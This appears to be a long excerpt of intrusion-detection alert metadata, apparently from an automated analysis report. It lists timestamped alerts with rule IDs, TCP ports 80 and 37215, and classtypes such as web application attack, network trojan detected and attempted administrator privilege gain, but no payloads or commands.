              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.255942
              SID:2829579
              Source Port:42316
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.274260
              SID:2829579
              Source Port:60032
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.246794
              SID:2030092
              Source Port:43646
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.261750
              SID:2829579
              Source Port:49726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.224422
              SID:2030092
              Source Port:57186
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.265615
              SID:2030092
              Source Port:46094
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.255707
              SID:2829579
              Source Port:51746
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.239740
              SID:2030092
              Source Port:60104
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.240320
              SID:2030092
              Source Port:49912
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.254417
              SID:2835222
              Source Port:33544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.265997
              SID:2030092
              Source Port:32972
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.263203
              SID:2829579
              Source Port:50546
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.237843
              SID:2030092
              Source Port:51866
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.239975
              SID:2025883
              Source Port:55520
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:53.239781
              SID:2030092
              Source Port:50078
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.265049
              SID:2030092
              Source Port:33864
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.274796
              SID:2829579
              Source Port:40428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.254454
              SID:2829579
              Source Port:47530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.262354
              SID:2829579
              Source Port:57030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.252168
              SID:2835222
              Source Port:49194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.266529
              SID:2030092
              Source Port:38612
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.267705
              SID:2030092
              Source Port:35598
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.275058
              SID:2835222
              Source Port:51176
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.252117
              SID:2829579
              Source Port:36204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.288192
              SID:2835222
              Source Port:53054
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.305939
              SID:2829579
              Source Port:40892
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.241257
              SID:2025883
              Source Port:38354
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.252555
              SID:2835222
              Source Port:49600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.262753
              SID:2829579
              Source Port:43784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.255482
              SID:2829579
              Source Port:57988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.275029
              SID:2829579
              Source Port:52246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.307479
              SID:2835222
              Source Port:60150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.265734
              SID:2030092
              Source Port:51458
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.238596
              SID:2030092
              Source Port:32936
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:53.240154
              SID:2030092
              Source Port:39420
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.274661
              SID:2835222
              Source Port:58694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.255200
              SID:2829579
              Source Port:56718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.240463
              SID:2025883
              Source Port:37714
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:55.265647
              SID:2030092
              Source Port:56880
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.273833
              SID:2835222
              Source Port:40358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.275278
              SID:2835222
              Source Port:36160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.273878
              SID:2835222
              Source Port:60218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.241470
              SID:2025883
              Source Port:58476
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.251714
              SID:2829579
              Source Port:55452
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.233612
              SID:2829579
              Source Port:47420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.267380
              SID:2030092
              Source Port:40128
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:53.238996
              SID:2030092
              Source Port:58076
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.259394
              SID:2829579
              Source Port:46300
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.275397
              SID:2835222
              Source Port:58696
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.252427
              SID:2835222
              Source Port:49906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.261204
              SID:2829579
              Source Port:42426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.251796
              SID:2829579
              Source Port:57566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.245720
              SID:2030092
              Source Port:49594
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.260018
              SID:2829579
              Source Port:35538
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.275438
              SID:2829579
              Source Port:50042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.274916
              SID:2835222
              Source Port:46990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.239527
              SID:2025883
              Source Port:34360
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:56.306870
              SID:2829579
              Source Port:49334
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.252084
              SID:2835222
              Source Port:54532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.245249
              SID:2025883
              Source Port:52570
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.253050
              SID:2835222
              Source Port:54402
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.254853
              SID:2829579
              Source Port:47606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.275631
              SID:2829579
              Source Port:59058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.247003
              SID:2030092
              Source Port:40782
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:53.238429
              SID:2030092
              Source Port:39486
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:53.239991
              SID:2030092
              Source Port:32914
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.240221
              SID:2025883
              Source Port:53534
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:55.261422
              SID:2829579
              Source Port:41992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.267015
              SID:2030092
              Source Port:57650
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.253905
              SID:2829579
              Source Port:45198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.308000
              SID:2835222
              Source Port:39248
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.245498
              SID:2025883
              Source Port:42136
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:55.261159
              SID:2835222
              Source Port:57668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.256722
              SID:2829579
              Source Port:52616
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.253014
              SID:2835222
              Source Port:55216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.307292
              SID:2829579
              Source Port:49158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.254086
              SID:2835222
              Source Port:49882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.238153
              SID:2030092
              Source Port:56838
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.246812
              SID:2025883
              Source Port:43896
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.255976
              SID:2835222
              Source Port:41036
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.274464
              SID:2829579
              Source Port:35470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.266159
              SID:2030092
              Source Port:56890
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.239818
              SID:2030092
              Source Port:50036
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.245784
              SID:2030092
              Source Port:59086
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.239201
              SID:2025883
              Source Port:44888
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:53.239114
              SID:2030092
              Source Port:44372
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.275477
              SID:2835222
              Source Port:45632
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.239819
              SID:2030092
              Source Port:44778
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.268528
              SID:2030092
              Source Port:36644
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:53.240505
              SID:2025883
              Source Port:50218
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:55.262933
              SID:2829579
              Source Port:43420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.268035
              SID:2030092
              Source Port:49550
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:53.240919
              SID:2025883
              Source Port:33878
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.255507
              SID:2829579
              Source Port:57296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.253499
              SID:2829579
              Source Port:34684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.252202
              SID:2835222
              Source Port:41014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.251939
              SID:2835222
              Source Port:35612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.240725
              SID:2030092
              Source Port:32974
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.265213
              SID:2030092
              Source Port:39394
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.239497
              SID:2025883
              Source Port:45190
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:53.237611
              SID:2030092
              Source Port:57450
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.266592
              SID:2030092
              Source Port:50724
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.240458
              SID:2030092
              Source Port:35078
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.254225
              SID:2025883
              Source Port:46648
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.254785
              SID:2829579
              Source Port:36170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.265935
              SID:2030092
              Source Port:55482
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.254747
              SID:2835222
              Source Port:45572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.255124
              SID:2835222
              Source Port:35932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.266247
              SID:2030092
              Source Port:36378
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.246669
              SID:2030092
              Source Port:35082
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.254489
              SID:2835222
              Source Port:60378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.238344
              SID:2025883
              Source Port:46754
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:55.262801
              SID:2829579
              Source Port:43862
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.274024
              SID:2829579
              Source Port:52602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.241011
              SID:2030092
              Source Port:46490
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.260064
              SID:2835222
              Source Port:42688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.267599
              SID:2030092
              Source Port:49982
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:53.240242
              SID:2030092
              Source Port:34922
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.307801
              SID:2835222
              Source Port:52408
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.247036
              SID:2030092
              Source Port:56362
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.253169
              SID:2829579
              Source Port:41296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.244558
              SID:2030092
              Source Port:56334
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.239716
              SID:2030092
              Source Port:52274
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.263799
              SID:2829579
              Source Port:47668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.238811
              SID:2025883
              Source Port:56774
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:56.254840
              SID:2025883
              Source Port:50144
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:56.288115
              SID:2829579
              Source Port:54864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.275795
              SID:2829579
              Source Port:47684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.254976
              SID:2835222
              Source Port:56050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.259625
              SID:2829579
              Source Port:34526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.307625
              SID:2835222
              Source Port:38878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.274503
              SID:2835222
              Source Port:56590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.237719
              SID:2030092
              Source Port:54410
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.263359
              SID:2829579
              Source Port:45096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.263544
              SID:2829579
              Source Port:34470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.244906
              SID:2030092
              Source Port:37372
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.274630
              SID:2829579
              Source Port:60168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.263597
              SID:2835222
              Source Port:37740
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.256596
              SID:2835222
              Source Port:41396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.306118
              SID:2835222
              Source Port:36192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.245457
              SID:2025883
              Source Port:41602
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:55.260121
              SID:2829579
              Source Port:45602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.274950
              SID:2835222
              Source Port:50200
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.240112
              SID:2030092
              Source Port:47714
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.240667
              SID:2030092
              Source Port:39030
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.256207
              SID:2829579
              Source Port:45658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.268493
              SID:2030092
              Source Port:44224
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.259707
              SID:2829579
              Source Port:42860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.246355
              SID:2025883
              Source Port:47646
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:56.308137
              SID:2835222
              Source Port:48752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.253620
              SID:2829579
              Source Port:46024
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.252728
              SID:2829579
              Source Port:57592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.240978
              SID:2025883
              Source Port:53558
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.253278
              SID:2835222
              Source Port:58966
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.241607
              SID:2025883
              Source Port:52886
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:53.239929
              SID:2030092
              Source Port:36546
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.239533
              SID:2030092
              Source Port:41362
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.232018
              SID:2030092
              Source Port:43444
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.307512
              SID:2829579
              Source Port:54276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.240886
              SID:2030092
              Source Port:39732
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:53.241435
              SID:2030092
              Source Port:48762
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:53.240062
              SID:2025883
              Source Port:51500
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.240025
              SID:2030092
              Source Port:33688
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.245427
              SID:2025883
              Source Port:59018
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:55.259667
              SID:2829579
              Source Port:53642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.288088
              SID:2835222
              Source Port:53796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.254259
              SID:2835222
              Source Port:59806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.238224
              SID:2030092
              Source Port:49524
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:53.239557
              SID:2030092
              Source Port:56234
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:53.241160
              SID:2030092
              Source Port:42950
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:53.240794
              SID:2025883
              Source Port:33210
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:56.255231
              SID:2025883
              Source Port:44092
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:53.237898
              SID:2030092
              Source Port:37480
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.306153
              SID:2829579
              Source Port:59834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.308094
              SID:2829579
              Source Port:36302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.273749
              SID:2829579
              Source Port:47490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.237993
              SID:2025883
              Source Port:47054
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.253940
              SID:2829579
              Source Port:36686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.307179
              SID:2835222
              Source Port:37022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.253854
              SID:2829579
              Source Port:42030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.264788
              SID:2030092
              Source Port:56736
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.263107
              SID:2829579
              Source Port:52304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.244830
              SID:2025883
              Source Port:54968
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.238439
              SID:2030092
              Source Port:36208
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.251747
              SID:2829579
              Source Port:40380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.274833
              SID:2829579
              Source Port:46780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.241729
              SID:2025883
              Source Port:34492
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:55.267076
              SID:2030092
              Source Port:37184
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.266307
              SID:2030092
              Source Port:40972
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.257094
              SID:2835222
              Source Port:51850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.239596
              SID:2030092
              Source Port:51050
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.255251
              SID:2025883
              Source Port:47712
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.251831
              SID:2829579
              Source Port:35770
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.275663
              SID:2835222
              Source Port:54092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.238606
              SID:2030092
              Source Port:55292
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.245457
              SID:2030092
              Source Port:41602
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.246218
              SID:2025883
              Source Port:47938
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.251612
              SID:2829579
              Source Port:38836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.266913
              SID:2030092
              Source Port:43296
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
